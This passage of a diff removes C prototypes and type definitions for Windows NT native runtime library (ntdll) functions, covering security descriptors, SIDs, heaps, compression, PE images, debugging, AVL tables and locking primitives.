-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetOwnerSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PSID *Owner,
- _Out_ PBOOLEAN OwnerDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetGroupSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PSID *Group,
- _Out_ PBOOLEAN GroupDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetDaclSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PBOOLEAN DaclPresent,
- _Out_ PACL *Dacl,
- _Out_ PBOOLEAN DaclDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetSaclSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _Out_ PBOOLEAN SaclPresent,
- _Out_ PACL *Sacl,
- _Out_ PBOOLEAN SaclDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateAcl(
- _Out_writes_bytes_(AclLength) PACL Acl,
- _In_ ULONG AclLength,
- _In_ ULONG AclRevision);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlValidAcl(
- _In_ PACL Acl);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryInformationAcl(
- _In_ PACL Acl,
- _Out_writes_bytes_(AclInformationLength) PVOID AclInformation,
- _In_ ULONG AclInformationLength,
- _In_ ACL_INFORMATION_CLASS AclInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetInformationAcl(
- _Inout_ PACL Acl,
- _In_reads_bytes_(AclInformationLength) PVOID AclInformation,
- _In_ ULONG AclInformationLength,
- _In_ ACL_INFORMATION_CLASS AclInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG StartingAceIndex,
- _In_reads_bytes_(AceListLength) PVOID AceList,
- _In_ ULONG AceListLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDeleteAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceIndex);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetAce(
- _In_ PACL Acl,
- _In_ ULONG AceIndex,
- _Outptr_ PVOID *Ace);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlFirstFreeAce(
- _In_ PACL Acl,
- _Out_ PVOID *FirstFree);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlOwnerAcesPresent(
- _In_ PACL pAcl);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessAllowedAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessAllowedAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessAceEx(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessAllowedObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddCompoundAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ UCHAR AceType,
- _In_ ACCESS_MASK AccessMask,
- _In_ PSID ServerSid,
- _In_ PSID ClientSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddMandatoryAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ PSID Sid,
- _In_ UCHAR AceType,
- _In_ ACCESS_MASK AccessMask);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDefaultNpAcl(
- _Out_ PACL *Acl);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlMapGenericMask(
- _In_ PACCESS_MASK AccessMask,
- _In_ PGENERIC_MAPPING GenericMapping);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlValidSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualSid(
- _In_ PSID Sid1,
- _In_ PSID Sid2);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualPrefixSid(
- _In_ PSID Sid1,
- _In_ PSID Sid2);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthRequiredSid(
- _In_ ULONG SubAuthorityCount);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlFreeSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAllocateAndInitializeSid(
- _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
- _In_ UCHAR SubAuthorityCount,
- _In_ ULONG SubAuthority0,
- _In_ ULONG SubAuthority1,
- _In_ ULONG SubAuthority2,
- _In_ ULONG SubAuthority3,
- _In_ ULONG SubAuthority4,
- _In_ ULONG SubAuthority5,
- _In_ ULONG SubAuthority6,
- _In_ ULONG SubAuthority7,
- _Out_ PSID *Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeSid(
- _Out_ PSID Sid,
- _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
- _In_ UCHAR SubAuthorityCount);
-
-NTSYSAPI
-PSID_IDENTIFIER_AUTHORITY
-NTAPI
-RtlIdentifierAuthoritySid(
- _In_ PSID Sid);
-
-NTSYSAPI
-PULONG
-NTAPI
-RtlSubAuthoritySid(
- _In_ PSID Sid,
- _In_ ULONG SubAuthority);
-
-NTSYSAPI
-PUCHAR
-NTAPI
-RtlSubAuthorityCountSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySid(
- _In_ ULONG DestinationSidLength,
- _In_ PSID DestinationSid,
- _In_ PSID SourceSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySidAndAttributesArray(
- _In_ ULONG ArrayLength,
- _In_ PSID_AND_ATTRIBUTES Source,
- _In_ ULONG TargetSidBufferSize,
- _Out_ PSID_AND_ATTRIBUTES TargetArrayElement,
- _Out_ PSID TargetSid,
- _Out_ PSID *NextTargetSid,
- _Out_ PULONG RemainingTargetSidBufferSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlLengthSidAsUnicodeString(
- _In_ PSID Sid,
- _Out_ PULONG StringLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlConvertSidToUnicodeString(
- _In_ PUNICODE_STRING UnicodeString,
- _In_ PSID Sid,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateServiceSid(
- _In_ PUNICODE_STRING ServiceName,
- _Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid,
- _Inout_ PULONG ServiceSidLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ ULONG Revision);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetOwnerSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ PSID Owner,
- _In_ BOOLEAN OwnerDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,
- _Out_ PSECURITY_DESCRIPTOR *OutputSecurityDescriptor);
-
-FORCEINLINE LUID NTAPI RtlConvertLongToLuid(
- _In_ LONG Long
-)
-{
- LUID TempLuid;
- LARGE_INTEGER TempLi;
-
- TempLi.QuadPart = Long;
- TempLuid.LowPart = TempLi.LowPart;
- TempLuid.HighPart = TempLi.HighPart;
- return(TempLuid);
-}
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlUniform(
- _Inout_ PULONG Seed);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRandomEx(
- _Inout_ PULONG Seed);
-
-NTSYSAPI
-ULONG32
-NTAPI
-RtlComputeCrc32(
- _In_ ULONG32 PartialCrc,
- _In_ PVOID Buffer,
- _In_ ULONG Length);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAdjustPrivilege(
- _In_ ULONG Privilege,
- _In_ BOOLEAN Enable,
- _In_ BOOLEAN Client,
- _Out_ PBOOLEAN WasEnabled);
-
-/************************************************************************************
-*
-* RTL Version API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetVersion(
- _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlGetNtVersionNumbers(
- _Out_opt_ PULONG MajorVersion,
- _Out_opt_ PULONG MinorVersion,
- _Out_opt_ PULONG BuildNumber);
-
-/************************************************************************************
-*
-* RTL Error Status API.
-*
-************************************************************************************/
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNtStatusToDosError(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSetLastWin32Error(
- _In_ LONG Win32Error);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetLastNtStatus(
- VOID);
-
-NTSYSAPI
-LONG
-NTAPI
-RtlGetLastWin32Error(
- VOID);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNtStatusToDosErrorNoTeb(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSetLastWin32ErrorAndNtStatusFromNtStatus(
- _In_ NTSTATUS Status);
-
-/************************************************************************************
-*
-* RTL WOW64 Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64EnableFsRedirection(
- _In_ BOOLEAN Wow64FsEnableRedirection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64EnableFsRedirectionEx(
- _In_ PVOID DisableFsRedirection,
- _Out_ PVOID *OldFsRedirectionLevel);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64GetThreadContext(
- _In_ HANDLE ThreadHandle,
- _Inout_ PWOW64_CONTEXT ThreadContext);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64SetThreadContext(
- _In_ HANDLE ThreadHandle,
- _In_ PWOW64_CONTEXT ThreadContext);
-
-/************************************************************************************
-*
-* RTL Heap Management API.
-*
-************************************************************************************/
-
-typedef NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(
- _In_ PVOID Base,
- _Inout_ PVOID *CommitAddress,
- _Inout_ PSIZE_T CommitSize
- );
-
-typedef struct _RTL_HEAP_PARAMETERS {
- ULONG Length;
- SIZE_T SegmentReserve;
- SIZE_T SegmentCommit;
- SIZE_T DeCommitFreeBlockThreshold;
- SIZE_T DeCommitTotalFreeThreshold;
- SIZE_T MaximumAllocationSize;
- SIZE_T VirtualMemoryThreshold;
- SIZE_T InitialCommit;
- SIZE_T InitialReserve;
- PRTL_HEAP_COMMIT_ROUTINE CommitRoutine;
- SIZE_T Reserved[2];
-} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlCreateHeap(
- _In_ ULONG Flags,
- _In_opt_ PVOID HeapBase,
- _In_opt_ SIZE_T ReserveSize,
- _In_opt_ SIZE_T CommitSize,
- _In_opt_ PVOID Lock,
- _In_opt_ PRTL_HEAP_PARAMETERS Parameters);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlDestroyHeap(
- _In_ PVOID HeapHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetHeapInformation(
- _In_ PVOID HeapHandle,
- _In_ HEAP_INFORMATION_CLASS HeapInformationClass,
- _In_opt_ PVOID HeapInformation,
- _In_opt_ SIZE_T HeapInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryHeapInformation(
- _In_ PVOID HeapHandle,
- _In_ HEAP_INFORMATION_CLASS HeapInformationClass,
- _Out_opt_ PVOID HeapInformation,
- _In_opt_ SIZE_T HeapInformationLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAllocateHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ SIZE_T Size);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlFreeHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ PVOID BaseAddress);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlZeroHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags);
-
-NTSYSAPI
-SIZE_T
-NTAPI
-RtlSizeHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ PVOID BaseAddress);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlProtectHeap(
- _In_ PVOID HeapHandle,
- _In_ BOOLEAN MakeReadOnly);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlReAllocateHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _Frees_ptr_opt_ PVOID BaseAddress,
- _In_ SIZE_T Size);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlGetProcessHeaps(
- _In_ ULONG NumberOfHeaps,
- _Out_ PVOID *ProcessHeaps);
-
-typedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)(
- _In_ PVOID HeapHandle,
- _In_ PVOID Parameter
- );
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlEnumProcessHeaps(
- _In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine,
- _In_ PVOID Parameter);
-
-/************************************************************************************
-*
-* RTL Compression API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetCompressionWorkSpaceSize(
- _In_ USHORT CompressionFormatAndEngine,
- _Out_ PULONG CompressBufferWorkSpaceSize,
- _Out_ PULONG CompressFragmentWorkSpaceSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCompressBuffer(
- _In_ USHORT CompressionFormatAndEngine,
- _In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _In_ ULONG UncompressedChunkSize,
- _Out_ PULONG FinalCompressedSize,
- _In_ PVOID WorkSpace);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDecompressBuffer(
- _In_ USHORT CompressionFormat,
- _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _Out_ PULONG FinalUncompressedSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDecompressBufferEx(
- _In_ USHORT CompressionFormat,
- _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _Out_ PULONG FinalUncompressedSize,
- _In_ PVOID WorkSpace);
-
-/************************************************************************************
-*
-* RTL Image API.
-*
-************************************************************************************/
-
-#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)
-
-NTSYSAPI
-PIMAGE_NT_HEADERS
-NTAPI
-RtlImageNtHeader(
- _In_ PVOID Base);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlImageNtHeaderEx(
- _In_ ULONG Flags,
- _In_ PVOID Base,
- _In_ ULONG64 Size,
- _Out_ PIMAGE_NT_HEADERS * OutHeaders);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddressInSectionTable(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID BaseOfImage,
- _In_ ULONG VirtualAddress);
-
-NTSYSAPI
-PIMAGE_SECTION_HEADER
-NTAPI
-RtlSectionTableFromVirtualAddress(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID BaseOfImage,
- _In_ ULONG VirtualAddress);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlImageDirectoryEntryToData(
- _In_ PVOID BaseOfImage,
- _In_ BOOLEAN MappedAsImage,
- _In_ USHORT DirectoryEntry,
- _Out_ PULONG Size);
-
-NTSYSAPI
-PIMAGE_SECTION_HEADER
-NTAPI
-RtlImageRvaToSection(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID Base,
- _In_ ULONG Rva);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlImageRvaToVa(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID Base,
- _In_ ULONG Rva,
- _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);
-
-/************************************************************************************
-*
-* RTL Time API.
-*
-************************************************************************************/
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSecondsSince1970ToTime(
- _In_ ULONG ElapsedSeconds,
- _Out_ PLARGE_INTEGER Time);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSecondsSince1980ToTime(
- _In_ ULONG ElapsedSeconds,
- _Out_ PLARGE_INTEGER Time);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTimeToSecondsSince1980(
- _In_ PLARGE_INTEGER Time,
- _Out_ PULONG ElapsedSeconds);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlTimeToTimeFields(
- _In_ PLARGE_INTEGER Time,
- _Out_ PTIME_FIELDS TimeFields);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTimeFieldsToTime(
- _In_ PTIME_FIELDS TimeFields,
- _Out_ PLARGE_INTEGER Time);
-
-/************************************************************************************
-*
-* RTL Debug Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-ULONG
-STDAPIVCALLTYPE
-DbgPrint(
- _In_z_ _Printf_format_string_ PCH Format,
- ...);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgQueryDebugFilterState(
- _In_ ULONG ComponentId,
- _In_ ULONG Level);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgSetDebugFilterState(
- _In_ ULONG ComponentId,
- _In_ ULONG Level,
- _In_ BOOLEAN State);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgUserBreakPoint(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgBreakPoint(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiConnectToDbg(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgUiSetThreadDebugObject(
- _In_ HANDLE DebugObject);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiContinue(
- _In_ PCLIENT_ID AppClientId,
- _In_ NTSTATUS ContinueStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiStopDebugging(
- _In_ HANDLE Process);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiDebugActiveProcess(
- _In_ HANDLE Process);
-
-/************************************************************************************
-*
-* RTL AVL Tree API.
-*
-************************************************************************************/
-
-typedef enum _TABLE_SEARCH_RESULT {
- TableEmptyTree,
- TableFoundNode,
- TableInsertAsLeft,
- TableInsertAsRight
-} TABLE_SEARCH_RESULT;
-
-typedef enum _RTL_GENERIC_COMPARE_RESULTS {
- GenericLessThan,
- GenericGreaterThan,
- GenericEqual
-} RTL_GENERIC_COMPARE_RESULTS;
-
-//
-// Add an empty typedef so that functions can reference the
-// a pointer to the generic table struct before it is declared.
-//
-
-#if defined (__cplusplus)
-struct _RTL_AVL_TABLE;
-#else
-typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;
-typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;
-#endif
-
-typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ PVOID FirstStruct,
- _In_ PVOID SecondStruct
- );
-
-typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ ULONG ByteSize
- );
-
-typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ _Post_invalid_ PVOID Buffer
- );
-
-typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ PVOID UserData,
- _In_ PVOID MatchData
- );
-
-typedef struct _RTL_BALANCED_LINKS {
- struct _RTL_BALANCED_LINKS *Parent;
- struct _RTL_BALANCED_LINKS *LeftChild;
- struct _RTL_BALANCED_LINKS *RightChild;
- CHAR Balance;
- UCHAR Reserved[3];
-} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;
-
-typedef struct _RTL_AVL_TABLE {
- RTL_BALANCED_LINKS BalancedRoot;
- PVOID OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- ULONG DepthOfTree;
- PRTL_BALANCED_LINKS RestartKey;
- ULONG DeleteCount;
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_AVL_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitializeGenericTableAvl(
- _Out_ PRTL_AVL_TABLE Table,
- _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,
- _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,
- _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,
- _In_opt_ PVOID TableContext);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlInsertElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_reads_bytes_(BufferSize) PVOID Buffer,
- _In_ CLONG BufferSize,
- _Out_opt_ PBOOLEAN NewElement);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlInsertElementGenericTableFullAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_reads_bytes_(BufferSize) PVOID Buffer,
- _In_ CLONG BufferSize,
- _Out_opt_ PBOOLEAN NewElement,
- _In_ PVOID NodeOrParent,
- _In_ TABLE_SEARCH_RESULT SearchResult);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDeleteElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupElementGenericTableFullAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer,
- _Out_ PVOID *NodeOrParent,
- _Out_ TABLE_SEARCH_RESULT *SearchResult);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ BOOLEAN Restart);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableWithoutSplayingAvl(
- _In_ PRTL_AVL_TABLE Table,
- _Inout_ PVOID *RestartKey);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupFirstMatchingElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer,
- _Out_ PVOID *RestartKey);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableLikeADirectory(
- _In_ PRTL_AVL_TABLE Table,
- _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,
- _In_opt_ PVOID MatchData,
- _In_ ULONG NextFlag,
- _Inout_ PVOID *RestartKey,
- _Inout_ PULONG DeleteCount,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlGetElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ ULONG I);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNumberGenericTableElementsAvl(
- _In_ PRTL_AVL_TABLE Table);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlIsGenericTableEmptyAvl(
- _In_ PRTL_AVL_TABLE Table);
-
-/************************************************************************************
-*
-* RTL Critical Section Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlEnterCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlLeaveCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlIsCriticalSectionLocked(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlIsCriticalSectionLockedByThread(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlGetCriticalSectionRecursionCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlTryEnterCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEnableEarlyCriticalSectionEventCreation(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeCriticalSectionAndSpinCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection,
- _In_ ULONG SpinCount);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlSetCriticalSectionSpinCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection,
- _In_ ULONG SpinCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDeleteCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-/************************************************************************************
-*
-* RTL SRW Lock Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitializeSRWLock(
- _Out_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleaseSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleaseSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
